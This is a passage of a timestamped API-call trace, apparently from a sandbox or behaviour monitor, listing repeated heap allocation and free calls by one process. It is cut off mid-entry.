1 [0097.032] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.032] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.032] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.032] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.033] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.033] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.033] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.033] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0097.033] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.033] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.033] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.033] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.033] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.033] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.033] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.033] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.033] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.033] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.033] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.033] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.033] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.033] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.034] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.034] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.034] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.034] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.034] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.034] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0097.034] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.034] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.034] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.034] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0097.034] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.034] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.034] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.034] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.034] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.034] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.035] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.035] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.035] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.035] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.035] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.035] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.035] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.036] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.036] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.036] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.036] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.036] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.036] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.036] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.036] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.036] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.036] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.036] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.036] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x9b91b28 [0097.036] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.036] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.036] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.036] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.037] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.037] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x9b91b28 [0097.037] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.037] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.037] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.037] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.037] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.037] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.038] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.038] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.038] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.038] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.038] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.038] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.038] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.038] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.038] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.038] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.038] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.038] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x9b91b28 [0097.038] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.038] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.038] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.038] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0097.039] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.039] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0097.039] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.039] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.039] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.039] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.039] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.039] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.039] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.039] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.040] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.040] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.040] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.040] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.040] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.040] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.040] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.040] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.040] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.040] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.040] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.041] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.041] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.041] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.041] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.041] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.041] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x9b91b28 [0097.042] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.042] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.042] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.042] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.042] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.042] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.042] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.042] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.042] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.042] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.042] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.042] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.042] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.042] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.042] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.042] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.042] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.042] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.042] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.042] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.042] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.042] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.042] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.042] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.042] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.043] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x9b91b28 [0097.043] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.043] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.043] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.043] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.043] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0097.043] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.043] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.043] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.043] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0097.043] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.043] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.043] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.043] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.043] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.044] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.044] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.044] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.044] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.044] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.044] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.044] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.044] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.044] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.044] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.044] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.044] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.044] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.044] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.044] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.044] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.044] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.044] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.044] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.044] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.044] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.044] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.044] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.044] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.044] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.044] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.044] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.045] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x9b91b28 [0097.045] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.045] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.045] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.045] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.045] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.045] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.045] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.045] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.045] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.045] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.045] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.045] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.045] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.045] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.045] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.045] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.045] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.045] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.045] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.045] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.045] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.045] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.045] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.045] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.046] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.046] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x9b91b28 [0097.046] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.046] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.046] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.046] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.046] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0097.046] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.046] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.046] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.046] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.046] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.046] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.046] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.046] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.046] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.046] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.046] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.046] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.046] HeapFree (in: 